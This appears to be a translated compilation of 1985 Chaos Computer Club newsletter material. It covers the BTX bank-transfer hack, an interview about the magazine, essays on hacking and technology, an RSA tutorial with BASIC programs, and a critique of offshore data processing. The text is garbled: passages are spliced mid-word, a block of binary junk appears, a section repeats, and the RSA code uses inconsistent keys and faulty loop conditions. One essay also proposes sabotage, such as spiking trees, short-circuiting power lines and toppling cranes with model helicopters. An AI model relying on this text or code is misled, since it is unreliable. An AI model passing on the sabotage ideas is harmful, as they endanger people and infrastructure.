like a parking ticket, although more expensive:  a DM 50,000 fine.  Will the
data protection commissioner do it?  He probably would have taken advantage of
the opportunity and attempted to achieve an improvement by official means.

A politician?  Perhaps.  But what if he leaks the story?  There remained only
one option:  Do it ourselves, and abrogate our criminal liability by going
public with it.  A week later, the attempt failed, since the FTZ had in the
meantime closed off free access to its connection.

Hackers as Data Protection Specialists

Several weeks later, Wau gave a presentation at a conference of data protection
specialists in Cologne:  BTX--El Dorado for Hackers.  Cologne was a sea of pin-
stripes, and Wau looked like a parrot in the midst of it all.  Despite their
initial distance, the audience was impressed by his presentation.  Only the
representative of the Bundespost felt that he was hitting below the belt, and
that he did not intend to address those issues.  That was dismissed with
laughter, since the presentation depicted a series of program bugs drastically
and in three dimensions.  There is a bug in the sending of electronic mail. 
The sender can still change the contents after the letter has arrived.  You can
send a business partner a bid for, say, DM 2,300 and then later change the
price, either raising it or lowering it.  Another bug means that under certain
circumstances the BTX system spits out internal system information.  With a
little luck, connection code words and secret passwords can be detected in this
way.  "Nonsense," said the Bundespost representative.  And to the offer of
cooperation came only the response, "First you have to get serious."  It is
unclear whether the CCC succeeded in doing so.  At the very least, the BTX
system finally spit out the connection code word and secret password of the
Hamburger Sparkasse after a number of tries with the well-known system bug. 
Thus, it became possible to carry out the presentation planned for the FTZ with
the Sparkasse instead.

Almost everything went as planned.  Over night, in 12 hours and 59 minutes, a
good DM 134,000 was raised.  With a portabf @%en run in a
daily newspaper, and a meeting of two dozen people from all over West Germany
then took place in Berlin.  We then decided to keep in touch and exchange
experiences.  The idea was simply to put together a magazine, but at that point
it was all too vague, and it didn't come off.  Next, contacts with the United
States were established, with Cheshire Catalyst (the "king" of U.S. hackers,
Ed.) and with his magazine TAP, which a bunch of people here in West Germany
already knew about and subscribed to.  At the Telecom in the fall of 1983, I
met him personally and wrote a two-page article about him in a daily newspaper. 
And this two-page article elicited a great deal of response.  By the end of the
year, things had progressed far enough to set up a magazine.  Previously, the
idea was to exchange all information by floppy disk, but everything was
incompatible, and it had no purpose.  The magazine was announced around the
beginning of the year, and we received 100 replies within one week.  And so to
us in Hamburg, it was obvious:  If 100 people want it, then it has to be done. 
In March, the first issue was finally finished.  Once the first and second
issues were out, there was a veritable flood of letters.  The amount of mail
was equivalent to placing both my hands on end.

[Question]  How many subscriptions does the magazine have?

[Answer]  We took the course that whoever writes should get information,
regardless of whether they send money in.  The number of subscriptions
fluctuates somewhere over 200.

[Question]  How do your finances look right now?

[Answer]  Terrible!  The production costs are around 10 pfennigs per copy, for
both sides of a DIN A3 page.  On the other hand, the most expensive thing is
postage, 50 pfennigs a piece.  For each copy there are three copies that are
not paid for, that we simply send out, as a sample or in response to a request
with no money enclosed.  It is in fact financed by the skin of our teeth, but
we do hope that a number of people are willing to pay for it.  If money comes
in, then we can continue.

[Question]  And of the 200 subscriptions has each one paid around DM 30?

[Answer]  More or less.  They came in with the full amount, a couple sent more
than that, but unfortunately it was fewer than we had hoped.  It costs about DM
1000 to produce one issue of DATENSCHLEUDER.

[Question]  How long will people receive DATENSCHLEUDER for their DM 30?

[Answer]  One Chaos year.  That is effectively around one year, with around 10
issues.  You definitely have to give our address, or they'll come beating your
door down for that.

[Question]  How many regular members do you have now?

[Answer]  About the membership structure--it's rather open and free.  Everyone
who has information for us simply contributes it, whether he has a subscription
or simply receives DATENSCHLEUDER, or even if he knows nothing about
DATENSCHLEUDER.  There are people who are working on the modem layout, and we
are producing and marketing motherboards, for example.  And then we do
DATENSCHLEUDER, and also do communication via computer.  It is simply an open
structure, where anyone who feels like it can join in and leave at any time. 
But we are thinking about whether we should impose organizational structures on
the whole thing.  There are a couple of external areas where we are simply
encountering problems.  But on the other hand, we basically like this open
structure.  It's a dilemma.

[Question]  But surely you can provide an approximate number?

[Answer]  If we approach it in terms of subscriptions, we come up with more
than 200, of which around 30 are in Hamburg.  But that's very fluid.  Should I
count a graphic artist who does a couple of pictures for DATENSCHLEUDER as a
member?  We don't look at it that narrowly.  Somebody comes along, finds it
interesting, and joins in.  That's also how it is at our meetings, which we
hold once a week at a bar here in Hamburg.  We always get different people
there, it's just a regular meeting base.  On the other hand, we generally meet
once a month to exchange information.

[Question]  What kind of people are involved?

[Answer]  It ranges from pilots to a metalworker, people who run their own
shops to unemployed people and students.  They are between 16 and 35.  No one
is older than that.

[Question]  What is your assessment of the legal status of your activities?

[Answer]  We just don't like being forced into any corner.  Now people are
saying that it's all criminal, breaking into data bases and getting into
0=
 u~* t
F( v6&\R&tPFP^.v,v,&D&\F0 v,& F0^0&\ v,& F0&DF0&Duv,& F0&Dbv,& F0&DOv,&A F0&D<P P
Postreklame Hamburg, Eiffestr. 16, 2000 Hamburg 26

Mr Phan ba Qu
2000 Hamburg

Winner, happy ending

Dear Mr ba Qu!

The "BTX Hamburg Week 85" from 1-8 June dealt with BTX.

Information, joining in, winning--this was what was going on during this
fantastic action week.

And you won!  Congratulations!

From the happy ending conclusion of our big BTX competition, you will receive
as a prize your choice of

1 year subscription to DATENSCHLEUDER or
1 gift certificate for DM 25.

We look forward to giving you your prize; please call about details.

CCC Chaos Computer Club.

Sincerely,

[signature]

[p 44:  Boxed item]

June 1985

10 Previous month

Again, no revision in the month of June.

The CCC is currently working on the "Hacker Bible."  This work of approx. 254
pages will be published in the fall.

More on this after printing in the current section.

Have a sunny vacation!

Chaos Team

90 Next month

[p 44:  Boxed item]

Advertisement in BILD-HAMBURG paid for by the Bundespost

BTX Hamburg Week 85, 1-8 June

Information, join in, win

Here You Will See BTX "Live"

ABC-Datensysteme
Segeberger Chaussee 36, Norderstedt

A+L Infocenter
Isestr. 115, Hamburg 13

BTX Partner
Koopstr. 20-22, Hamburg 13

Chaos Computer Club International
[address redacted], Hamburg 20

Deutsche Bank
Spitalerstr. 16, Hamburg 1

Hamburg-Information
Pavillon, Gerhart-Hauptmann-Platz, Hamburg 1

HEW
Spitalerstrasse 22, Hamburg 1
Osterstrasse 133, Hamburg 20
Gr. Bergstrasse 223-225, Hamburg 50
Fuhlsbttler Strasse 229, Hamburg 60
Bergedorfer Strasse 133, Hamburg 80
Schlossmhlendamm 12, Hamburg 90

Philips
Mnckebergstr. 7, Hamburg 1
In the foyer

Vereins- und Westbank
Alter Wall 22, Hamburg 11

[p 45:  Cartoon]  Left bubble:  This is the horrible story of where
overmechanization and the associated shortening of the work week will lead if
we are not sensible about it.

Right bubble:  O Duckberg, you noble, you industrious city!  How much energy is
wasted within your walls because the citizens have not noticed that the future
is already upon us?

[p 45:  Caption, upper right corner]  The Chaos Computer Club thinks that love
on an empty stomach is no fun.

[pp 45-46:  Unattributed article]

Progress Into Chaos

Oh, Daniel, you quack.  So we're living in the beginning of the future.  In the
middle of chaos.  Terrible, terrible!  But that's no reason to go decadent and
engage in rampant consumerism.  There has always been chaos.  First violent and
ribald, then in the hammock.  Chin up!  Hope is the feeling that can achieve
what you long for.  And as long as THE bomb has not fallen, there is naturally
hope.
Where is chaos?  This was the 64-thousand-dollar question posed by the Black &
White Group to the CCC (TAZ of 22 February).  So let's see...

On Criticism of the CCC

... the result of these free tests has always been that the Bundespost has
filled in the gaps even tighter, and the system has become tangibly "more
secure..."

It is also true that the police learns something from each demonstration.  "In
contrast to the CCC, we (Black & White) are not interested in seeing
Bildschirmtext become more secure or in guaranteeing optimal 'data protection.' 
We are fundamentally opposed to BTX and to the computerization of all areas of
life."

Something that I somehow suspected all along, but did not dare ask:  security
in quotation marks.  Clearly ambiguous.

Precisely the synonym for all manifestations of "security."  With absolute
security (thanks to Albert), it is clear that the speed of light is the same
absolutely ALWAYS.  And otherwise not at all! [Footnote:  "Relative Interest? 
Bertrand Russell, "The ABCs of Relativity Theory," 1972, rororo 6787, DM 4.80]

Anyone who knows only a little about machines will not dare deny the following: 
The simpler the design of a machine and the fewer parts it has, the less
susceptible to disruption it is.  Thus, relatively simple machinery is more
flexible and can be adapted more easily to changing needs.  In contrast, our
technological society has specialized its functions to such a degree that the
entire system threatens to break down if only one part of the machinery
fails...

Overspecialization, biologists say, is one of the main factors that cause a
species to become extinct.

So how do things look in the computer industry?

Software.  The programs.  Experts think that for every legally sold diskette
there are up to ten pirated ones.  Of course, we know that there are more than
this.  The dimensions:  Millions of copies of the successful word-processing
program Wordstar have been sold.  DM 1,200 per diskette.  That comes to...  But
please consider the price-depressing factor of software piracy.  Eighty million
diskettes are sold worldwide each year.

The professional marketers of software have a bad hand, because their cards are
marked by their own operational structures.  Professional institutions need
their time for planning, organization, marketing, etc.

Most programs come from the United States.  Software piracy is hooked up in
networks.  "Security" again takes a back seat.  Quickly pirated, copies come
here to Germany by telecommunication.  Before the pros assert their
professional needs, the alternative need has spread:  Once the program has been
written, it can be copied by anyone in seconds.

Software can also be changed.  What's plagiarism?

A typical career:  A programmer writes a program.  Before completion, he is
fired.  He sets up his own company and sells the program himself.  How many
word-processing companies haven't come into being this way?

The legal opinion on this:  "A computer program constitutes unacceptable
plagiarism if it is on the average 70 percent identical to another program
system in its problem-solving section" (Kassel State Court ruling of 21 May
1981).

About hardware.  There are these wonderful Apple II computers.  They are so
wonderful that the yellow pirates from Taiwan can't help copying them for half
the price.  The Apple copyright applies only to the EPROMs (electrically
programmable read-only memory).  I buy that computer.  The dealer becomes hard
of hearing when I ask about these EPROMs.  Why all these questions?  It's
obvious that these are copies.  Everything's copied.  Legal?  Illegal?  It's
all the same!

And these are not isolated "chaotic" incidents.

Future Music

Creating a community that can be active in many different places and
nevertheless can be part of a joint, creative process.

Permitting electronic conferences by computer, making a single input or message
instantaneously available to all other terminals.  The distance between the
participants plays no role here.  In financial terms it does.  This is another
major field to be cultivated for data telecommunications.  Fantasies in the
making.

Hacking should not be viewed as being solely linked to computers.  Wood too is
hackable.  It is a description of a different manner of approaching technology. 
A different use is tested experimentally.  In this area, children are by nature
capable of colossal flights of fancy.  The "grown-up" world reacts with
incomprehension.  Childish creativity is rejected as being "crazy."  If only
people would let it be!  Learning by doing.  The knowledge developed in this
way has a completely different quality than knowledge, for example, because it
has emerged from practice.

Model-building division:  There is a model helicopter by the Graupner company. 
Bell 212 twin jet, two meters long, weighs four and a half kilograms.  Holds a
load of two and a half kilograms.  Remote-control, for DM 2,500.  A legal note: 
"If the 5 kg limit for model airplanes is exceeded, permission from the
competent aviation authorities must be obtained for takeoffs and landings."

What can be done?  "The Flying Robert is a model helicopter... from which a
computer hangs.  The computer, which is being developed by the Bazoobis, has a
sensor and--most importantly--a 'calculator with print-out capability.'  It has
a roll of paper on which the measured value is noted every second.  The thing
can be calibrated and sealed...  The Flying Robert is sent by remote-control
over a smokestack, where it hovers for an hour.  The same thing can be done for
radiation levels at nuclear power plants or noise levels near airports. 
Citizens' initiative groups would finally have verifiable data."  [Footnote: 
Mattias Horx, "Chip Generation," rororo 8118, 1984, DM 12.80, pp 125f]

Other ideas from various readily available publications:

You could fiddle with the computer and use it to disrupt various undertakings. 
Startbahn West [disputed new runway at Frankfurt/Main Airport]?  Equip it with
small cameras and use it for reconnaissance.  Equip it with squirt guns and use
it for agitation.  The Telemichel has a lot of room!  As a resupply craft while
occupying industrial facilities.  Or use it to seal up smokestacks?  Tip over
construction cranes, after outfitting it with the necessary equipment.  Use
teamwork to short-circuit high-tension wires.  Demolish/demodulate radio
antennas, or a flying radio transmitter, jamming transmitter, loudspeaker.  The
air knows no limits.

Normal airplane models are cheaper.  Electric engine.  Solar cells.  Sun. 
Flying time?  Fantasy in the making.

Protect the forests?  Long nails inserted crossways in trees are not exactly
the best thing for them, but they do keep chain saws from cutting them down.

Test alarm systems?  Set off the broken-glass alarm?  At C&A [department
store], all you need is to design a lucky charm, and the gong at the entrance
sounds.  Practical, chic and it can be worn.

The subject is not the big revolution, but rather the small, embarrassing
scandals that create confusion and ulcers and spoil the desire to exercise
power.  Anyone who knows any tricks should right to the "Lexicon of Subversive
Fantasy," c/o Eichborn Verlag, Sachsenhuser Landwehrweg 293, 6000 Frankfurt
70.  Copy to the CCC.

Rationalization

Black & White criticism:

"We reject these new techniques for increasing efficiency, because they lead to
further unemployment, and we are dependent on 'income from non-self-employed
work' to make a living."

How much work does a human being need in order to live?  Or does he live to
work?  What is work?

Work is force times distance (old mechanics' saying).  What is force?  Kinetic
energy and intellectual energy.  What is distance?  Movement.  Activity. 
Dynamics.  And:  entropy.  [Footnote:  Jeremy Rifkin, "Entropy," 1982, Hoffmann
& Campe, DM 30]

Entropy says that where there is activity, energy is irretrievably consumed,
rendering it no longer available for human use.  Our solar system will freeze
to death.  What is true of our solar system also applies to the relatively
closed system of Earth.  We should deal with energy sparingly.  Adapted to
natural cycles, with optimally low-entropy structures.  Alienation thus becomes
a central theme.  Labor is increasingly alienated the greater the distance--in
terms of space, place and time--there is between the production and consumption
of a product.  In order to consume little energy, it is advisable that the be
located close to the residential areas.  Rush hour is a nerve-wracking, energy-
consuming and accident-prone product of our sharply alienated "work world."

And so the masses shouldn't go to work at the same time on the same days.

Individual working hours are called for even more than ever.  And why not work
at home?  Will people miss the human contact with co-workers?  How human is
contact on the assembly line, in piecework, etc.?  Is it even capable of being
human?  There are jobs that really should not exist.  And if we economize these
job possibilities away, then it would be best if they simply disappear.

"For some time now it has begun to look as if we are no longer working in order
to live, but rather having to structure our lives in such a way that we have
enough work."  (Hans A. Pestalozzi)

Counter-Realization

Black & White criticism:  "The hackers have simply accepted that everything
that is coming is inevitable, and they are trying to find a comfortable niche
in it."

Nothing is inevitable.  No input, no output.  I am content with the fact that I
react.  A passive role.  Supplemented with Sysiphos work.

"... in every society, those asking questions have the key to power, not those
with the answers.  True power is with those who set up the structure that the
others must contemplate, because they define what is available and what is not,
what is recorded and what is forgotten."  [Footnote:  Jaques Vallee, "Computer
Networks," 1984, rororo 8101, DM 12.80, p 115]

Why are there no alternative software producers?  Are niches so abhorrent?

Let me make it perfectly clear:  I am for the computerization of our planet. 
The problems we are facing concern the earth as a whole.  Global, alternative
networking must be massively advanced.  A present-day computer has a memory
capacity of 64 kilos of bytes.  Multiplied by x-number of users worldwide, and
you have an unbeatable potential for creativity.  The melting pot of
alternative, green, lavender, checkered, etc. itself offers elbow room where
innovative ideas are developing en masse.  The only question is:  Where is the
application in practice?

The computer is an extremely universal tool.  I can make it do many boring,
monotonous administrative functions.  Word processing alone offers completely
new possibilities for dealing with words.  Everything can be combined with
graphics and music.  Data telecommunications.  Things are copied, simulated and
stored.  Everything can be printed out once or umpteen times.  Color.  Games. 
Control.  Manipulation.  Very small computer-controlled work stations can be
set up.  Here, the ideas can be (self-) realized.  Sales and marketing can be
done through further expanded telecommunications networks.

Why not try to take away the professionals' livelihood?  Niches can be very
flexible.  There are so many awful programs, and rarely good advice.  And
projects lack the money before and after.

"Blue Bazoobi":  The project builds computers.  Small portable terminals to
control air pressure valves.  DM 20,000 a piece.  Sold to Singapore, Brazil and
China.  The market niche is an area of application that is not feasible for the
pros, due to a lack of large volume.  There are fifty copies right now.  The
"Flying Robert" project will be financed with the money earned.  So things are
coming along.  A broad field of activity is opening up.

Effective immediately, the CCC is offering advice in all situations for the
Apple II computer.  Address for complements and the like:  TAZ Hamburg,
Apfelmus Department, Nernstweg 32, 2000 Hamburg 50, Wolfgang CCC, Kraut & Rben
Department.

[p 45:  Article by "Wau"]

Practical Note

Data processing is slowly but surely entering our everyday life.  It is
difficult to resist it.  A couple of practical notes:  Never release data if it
does not immediately seem reasonable to you.  Even then, be careful.  Asking
questions is free, but there must be time for it.  Make it clear that your data
is very personal, and ask how the people who are requesting your data handle
data protection.  Cancel your direct-debit order.  Think about what one
programmer at the electricity company could do with a couple million automatic
debit orders.  Don't get cable.  Keep your own data in order and do not let
someone else do it, even if it is more comfortable that way.

[p 46:  Article from GELSENKIRCHENER STADTZEITUNG]

Burglar Alarm

There were several questions about the burglar alarm, so here is the sketch
again.

The original dimensions of 60 x 80 mm should be adhered to rather closely.  The
copper wire (naturally insulated, otherwise it would be no good) can be found
in any electronics store, as can the capacitor.  With the copper wire arranged
as above, 30-40 picofarads cause a so-called field deviation within the
electronic fields between the bows, which is registered via the electronic
circuits.  The alarm is then triggered by way of a relay, and the detective is
there.  So far, so good.

The copper wire is soldered to the ends of the contacts.  While soldering, be
careful not to destroy the capacitor.  It would be great to have small-scale
mass production of this or other subversive products.

[p 47:  Article by "Wolfgang"]

The Future:  Entropy and Yeast Dough

Yeast dough, a so-called raising agent.  The dough must be handled carefully. 
A cool draft of air and it falls.  The nice swelling action turns into the
opposite.  Chaos among the bacteria!  (Yeast is a fungus, note from
headquarters.)

Institutions:  Objects that permanently grow.  Rising agent:  Money.  The
swelling process, shaken by crises, can drag on for decades.  Until the self-
sown storm is too powerful.  The system TILT.  Chaos among the bureaucrats!

Entropy says that the amount of energy in the universe is always constant. 
Nothing can be added, nothing used up.  Energy changes its "manifestation."  It
transforms itself from a state available to man to one not available to him.

All of our environmental pollution is a manifestation of our high-entropy
economy.  "In the three summer months alone, the United States consumes more
electricity for air conditioning than the population of the People's Republic
of China uses for its overall needs for the entire year.  And China has four
times as many people."  [Footnote:  Jeremy Rifkin, "Entropy," Hoffmann & Campe
82, p 134]

Everywhere that there is activity, energy is being transformed.  The available
supplies are evaporating appreciably.  Technology is going astray:  nuclear
technology, fusion technology, genetic engineering...

All systems where the energy input is greater than the output:  pacemaker for
cancer!

The oven is cold!

The dough has fallen.  Only rock-hard bread is possible now.  We have to make
do with what we have.  Or do we?  A new dough?  With a significantly different
recipe?

Are complex systems capable of innovation?

Of course not.  A ridiculous example:  Our diligent scientists are promoting
fusion technology as the solution to all our energy problems.  The bare facts
point to another conclusion.  The deuterium-tritium reactor needs tritium
molecules.  Tritium is obtained from lithium, an element that is as rare as
uranium.  Thus, limitless economizing is not possible.  Similarly necessary
substances, such as niobium and vanadium, are becoming more scarce even today. 
To say nothing of copper.

And the culmination of innovation potential:  The hydrogen-boron reactor,
filled with sea water, has a reaction temperature of three billion degrees
Celsius.  Just let that number roll slowly off your tongue!  There is no matter
that could even come close to standing up to that temperature.  The deuterium-
tritium reactor needs only 100 million degrees Celsius.  Nothing more practical
is possible.  "All applications of nuclear technology appear to him as if one
were using a chain saw to cut butter."  [Footnote:  Rifken, p 129]  Every
change in complex systems will by necessity cause changes in other places and
at different times.

The degree or the size of the complexity is critical in determining:
-  the effect of only one change, or of many changes;
-  the momentum of these changes, which, for example, are in turn the cause of
   further changes, etc...

Very interesting "autonomous," cumulative feedback processes can be set in
motion here.

The gaps discovered by hackers are naturally stopped up.  How?  With knitting
yarn.  That is, hardware, software and human beings are transformed, and thus
energy is used.

Since the earth is a relatively closed system (aside from solar energy, nothing
significantly is added), the following applies in particular to our planet: 
"In a closed system, material entropy must ultimately achieve its maximum." 
[Footnote:  Rifkin, p 50]

It is precisely the many changes in all institutions that are causing an
increase in energy consumption.  On payday, the co$t then?  Should we sell this breach
of security to the Bundespost?  We could, as is normal in industry, "hack" DM
100,000 or more and then sell the Bundespost consultation on this problem for a
certain percentage of the money.  Or get free, lifetime telephone service for
the CCC or something like that.  The Bundespost had to pay for its gross
negligence.

In both cases, however, the price would have been silence.  Otherwise, the
concentrated rage of the postal authorities would have been forthcoming. 
Consequently, perhaps half a dozen officials would have tried to do something
to the CCC.

But the CCC wanted enlightenment about the risks of this new system.  To this
end, the finance transaction had to be made public.  Fine, but who should push
the starting button for the money transfer?  After all, it is an infringement
like a parking ticket, although more expensive:  a DM 50,000 fine.  Will the
data protection commissioner do it?  He probably would have taken advantage of
the opportunity and attempted to achieve an improvement by official means.

A politician?  Perhaps.  But what if he leaks the story?  There remained only
one option:  Do it ourselves, and abrogate our criminal liability by going
public with it.  A week later, the attempt failed, since the FTZ had in the
meantime closed off free access to its connection.

Hackers as Data Protection Specialists

Several weeks later, Wau gave a presentation at a conference of data protection
specialists in Cologne:  BTX--El Dorado for Hackers.  Cologne was a sea of pin-
stripes, and Wau looked like a parrot in the midst of it all.  Despite their
initial distance, the audience was impressed by his presentation.  Only the
representative of the Bundespost felt that he was hitting below the belt, and
that he did not intend to address those issues.  That was dismissed with
laughter, since the presentation depicted a series of program bugs drastically
and in three dimensions.  There is a bug in the sending of electronic mail. 
The sendlled this
because the people who flashed on it are coincidentally named Rivest-Shamir-
Adleman.  Clever as mathematicians are, it occurred to them that you could take
a text like DAS IST JA ZUM KOTZEN [THAT'S DISGUSTING] and break it down into
ASCII characters, and thus end up with what mathematicians like best:  numbers! 
(n e N, 0"n" = 255) 68 65 83 32 73 83 84 32 74 65 32 90 85 77 32 79 84 90 69 78

These were then combined into groups of 6 characters:  686583 327383 843274
653290 857732 798490 697800.

The key to encoding the message, called n, is generally making it more
difficult to find the product of two primary numbers.  If you take 98415109
(which is a primary number) as a key, then you can start encoding the above
block:
(686583 * 686583 * 686583) mod 98415109 = encoded cryptoblock.

In order to decode this block, you need the corresponding key.  It is called d,
for decryption.  Decoding as well involves major calculation:
For n = 98415109, d = 63196467.
(Encoded cryptoblock ** 63196467) mod 98415109 = 686583.

As even non-mathematicians recognize immediately, the trick of the matter is
the two numbers n and d.

They are related as follows:
n is the product of two large primary numbers p and q (n = p * q);
d is determined from p and q:  d = (2 * (p-1) * (q-1) + 1)/3

Although n is known, p and q remain secret.  If n is big enough (around 200
digits), it is more or less impossible to determine p and q.  With a value for
n that is 300 digits long, it would theoretically take the NASA computer 600
years to figure out what p and q are.

In the example above, p = 7151 and q = 13259.  These primary numbers are
subject to further restrictions that must be taken into account if the RSA
nonsense is to run:
1. Neither p-1 nor q-1 may be evenly divisible by 3.
2. Either p-1 or q-1 must be a large primary number factor.
3. Dividing p by q must yield a complex fraction, thus not 2/3, 3/4, etc.

Taking points 2 and 3 into account means finding a qualitatively high-value n
that is difficult to decode.

Now to the programs:
Program 1:  Encoding messages
Program 2:  Decoding messages
Program 3:  Determining n and d
10 DEFDBL C,M,N:DIM M(100):CHARACTER PROBLOCK=3
20 LINE INPUT"Name of the crypto output file:";OUT
25 OPEN"O",1,OUT
30 INPUT"Public key of the receiver (Test condition at "RETURN<=94815109";N
40 IF N=0 THEN N=94815109
60 PRINT"Input message text or NNNN at beginning of line to end"
70 W=W+1:PRINT USING "";W;:LINE INPUT".:";M
71 IF LEFT(M,4)="NNNN" OR LEFT(M,4)="nnnn" THEN CLOSE:PRINT:PRINT
"Cryptogram under file: "OUT;" stored.":PRINT:PRINT:END
80 M=M+CHR(13):L=LEN(M):Q=INT(L/CHARACTER PROBLOCK)
90 R=L-Q*CHARACTER PROBLOCK
100 IF R<0 THEN M=M+CHR(0):GOTO 80
110 FOR I=0 TO Q-1
120 M(I)=0
130 FOR J=1 TO CHARACTER PROBLOCK
140 A=ASC(MID(M,3*I+J,1))
150 M(I)=M(I)*100
160 M(I)=M(I)+A
170 NEXT J
180 NEXT I
185 PRINT:PRINT"Cryptogram:"PRINT
190 FOR I=0 TO Q-1
200 M = M(I)
210 C=M*M:C=C-INT(C/N)*N:C=C*M:C=C-INT(C/N)*N
220 PRINT'1,USING "";C
225 PRINT USING "";C
230 NEXT I
235 PRINT:PRINT
240 GOTO 70

10 DEFDBL C,D,M,N
11 CHARACTER PROBLOCK=3
20 INPUT"Own Public Key (Test = 0+CR = 94815109) : ";N
30 IF N=0 THEN N=94815109
40 INPUT"Own Public Key (Test = 0+CR = 63196467) : ";D
50 IF D=0 THEN D=63196467
51 LINE INPUT"File name for decoded text : ";OUT
52 OPEN"O",2,OUT
60 LINE INPUT"Cryptogram from F<ile or M<anual : ";QUER
70 IF QUER="M" OR QUER="m" THEN MANUAL=-1:GOTO 90 ELSE MANUAL=0
80 LINE INPUT"File name for crypto file " ";FILE: OPEN"I",1,FILE
81 IF NOT (MANUAL) THEN PRINT:PRINT"Decoded text:":PRINT:PRINT
90 IF MANUAL THEN INPUT"Cryptoblock : ";C ELSE IF EOF(1) THEN CLOSE:PRINT"Text
end.":PRINT:PRINT:END ELSE INPUT'1,C
100 D1=D:M=1
110 IF D1/2 = INT(D1/2) THEN 130
120 M=M*C:M=M-INT(M/N)*N
130 C=C*C:C=C-INT(C/N)*N
140 D1=INT(D1/2):IF D1 < 0 THEN 110
150 M=STR(M):M=RIGHT(M,LEN(M)-1):'blank start with own interpr.
160 LX=LEN(M):IF (LX/2)"<INT(LX/2) THEN M="0"+M:GOTO 160
170 FOR T=1 TO CHARACTER PROBLOCK
180                               CHARACTER=MID(M,1+(T1)*2,2):CHARACTER=
CHR(VAL(CHARACTER))
190 PRINT CHARACTER;
200 PRINT'2,CHARACTER;
210 NEXT T
220 GOTO 90

5 RANDOMIZE
10 PRINT"Program for determining public and secret keys"
PRINT"=========================================================================
30 PRINT"To determine the secret key you need 2 (known only to you)"
40 PRINT"primary numbers p and q.  The following program consists of 2 parts:"
50 PRINT"Part 1 searches in the range of a randomly chosen number for the next"
60 PRINT"primary number that is suitable for p and q."
70 PRINT"Part 2 determines from the p and q located in the this way the secret
and public"
80 PRINT"keys."
90 PRINT
100 PRINT"Start Part 1":PRINT
110 DEFDBL N,P,Q,R,S,X,Y:K=10
120 INPUT"Number to be analyzed (0 for transition to program part 2) : ";N
130 IF N=0 THEN 280
140 IF N<99999999 THEN PRINT"Please select a smaller value":GOTO 120
150 IF N/2=INT(N/2) THEN N=N-1
160 FOR I=1 TO K
170 X=2+INT((N-2)*RND(0))
180 Y=1:P=N-1
190 IF P/2=INT(P/2) THEN 210
200 Y=Y*X:Y=Y-INT(Y/N)*N
210 X=X*X:X=X-INT(X/N)*N
220 P=INT(P/2):IF P<0 THEN 190
230 IF Y"<1 THEN 250
240 NEXT I
250 IF Y=1 THEN PRINT N;"is suitable as primary number for p or q":GOTO 120
260 PRINT"No suitable number found.  Test number now";N:N=N-2:GOTO 160
270 '
280 PRINT"Start Part 2":PRINT
290 INPUT"What value had you determined for p : ";P
300 INPUT"What value had you determined for q : ";Q
310 PRINT
320 PRINT"Your public key is : ";P*Q
330 PRINT"Your secret key is : ";(2*(P-1)*(Q-1)+1)/3
Ralf translates for MS-DOS from BYTE.

[pp 54-55:  Article by Maxin Holz]

Let Them Do Our Dirty Work

The headline was "joint production," a stylish description of the flight of
industry to countries with low wages and a peaceful workforce, and of disregard
for the environment.  Now that the office of the future is upon us, the U.S.
companies want others to have a part in it as well.  Encouraged by promises of
drastic reductions in cost through the remote transmission of information in
the course of mere seconds, industry analysts and foreign political figures are
formulating the idea of a new marriage of convenience between American business
and poor nations.  Although the "joint office" is not entirely new, industry
observers are now predicting the expansion of data input centers to poor
countries within a few years.

Before the new satellite technology was available, overseas branches could
profitably process only low-priority information that did not have to be turned
over quickly, such as order and shipping lists.  The best-known example of the
new trend is the American Airlines data processing center in Barbados.  Every
morning, American Airlines flies a planeload full of its ticket carbons to
Barbados, where data input workers input information at wages of $1.50 to $3.00
an hour.  The information is then returned electronically to the American
Airlines computer in the United States.

The U.S. companies were drawn by low wages, cheap office space and extremely
low taxes and surcharges, for which they were invited by the governments in
places such as Singapore, the Philippines and the Caribbean.  The preferred
goals for overseas offices are English-speaking countries like Barbados, in
addition to China, another country that is competing for jobs in information
processing using satellite communications, and as a special enticement can
offer its disciplined workforce, which earns the equivalent of $7 a week at a
precision rate of 99.5%

When explaining the advantages accrued to the receiving countries from overseas
investment, the chauvinistic presumptuousness of the economic press is exceeded
only by the self-serving optimism and short-sightedness of the governments that
are competing with one another for American investments.  Thus, NEWSWEEK
declared that since the products of the companies investing in the Caribbean
are prohibitively expensive for the people there, they "would do best to
produce goods for sale in the United States."  Now the inhabitants of Barbados
may also perform services that are meaningless to their own living situation. 
(What generosity by U.S. companies, which are giving the people of Barbados
data processing so that Americans can take airplane trips.)  The same article
explains that there is no longer a significant reservoir of unskilled laborers
in the United States (what about the unemployment rate of 40% among young
blacks?), while "in many underdeveloped countries there are enormous surpluses
of unskilled labor."  This theory of "give them our dirty work" attempts to
identify reasonable grounds for the distribution of labor that permits the
citizens of the United States to live much better than the vast majority of the
rest of the world.

In competing for investments, foreign governments and chambers of commerce are
shameless in their claims made to the American business community concerning
the paltry demands and high productivity of their population.  Government heads
justify tax exemptions by saying that they need foreign currency and the jobs
offered by the multinationals in order to raise the living standards in their
countries.  Moreover, the argument goes, the expanding technology accompanying
the overseas offices helps familiarize the local workforce with the computer,
thus closing the technological gap between industrial countries and developing
countries.

The possibility that such rose-colored projections will be fulfilled by
satellite-based data processing is extremely small, and that is even in the
unlikely event that unemployment will decrease for a time.  The so-called
"surplus" of unskilled workers in poor countries has resulted primarily from
past efforts resulting from investment policy, which were justified with the
same faulty logic.  From the foreign investments that were poured into the
"underdeveloped" countries after the Second World War, it was assumed that they
would lead to an international distribution of labor that would be beneficial
to all.  Farmers were driven off the land in order to make room for the modern
forms of exploitation preferred by multinational companies and local
governments.  While the multinationals blossomed, countries that had at one
time been agriculturally self-sufficient became dependent on developed
countries for food, and found themselves subject to a world market on which
they could exercise no influence.  Far from promoting regional industry and
agriculture, the foreign investments resulted in dependency on the
multinationals and on the markets dominated by them.  This in turn led to a
gigantic growth in debt owed to multinational banks and international credit
institutions controlled by the United States and its allies.  With the help of
these institutions, the developed countries tyrannically exert their influence
on the economic policy of the receiving countries.

The overseas office can only reinforce this phenomenon.  Data input centers in
Barbados cannot bridge any technological gaps.  The exported office jobs
primarily involve the most primitive and strenuous computer work, and their
elimination by automation will only be a question of time.  A country like
Barbados can never gain an independent place in a market dominated by
multinational giants.  Even under the best of conditions, a practical
application of computer technology to local problems would be extremely
expensive, and it would represent a disastrous waste of resources.

The cultural consequences of foreign investments could be at least as painful
as the directly economic ones.  The office environment (furnishings, clothing,
architecture) promotes a culture with an emphasis on material values, on a
maximum awareness of time, and on neutral, sterile modernity.  Regardless of
how finance centers present themselves throughout the world, they generate the
unifying effect of office culture.  An ever-smaller elite would actually be
able to work its way up to the comforts of merchandise heaven as glorified by
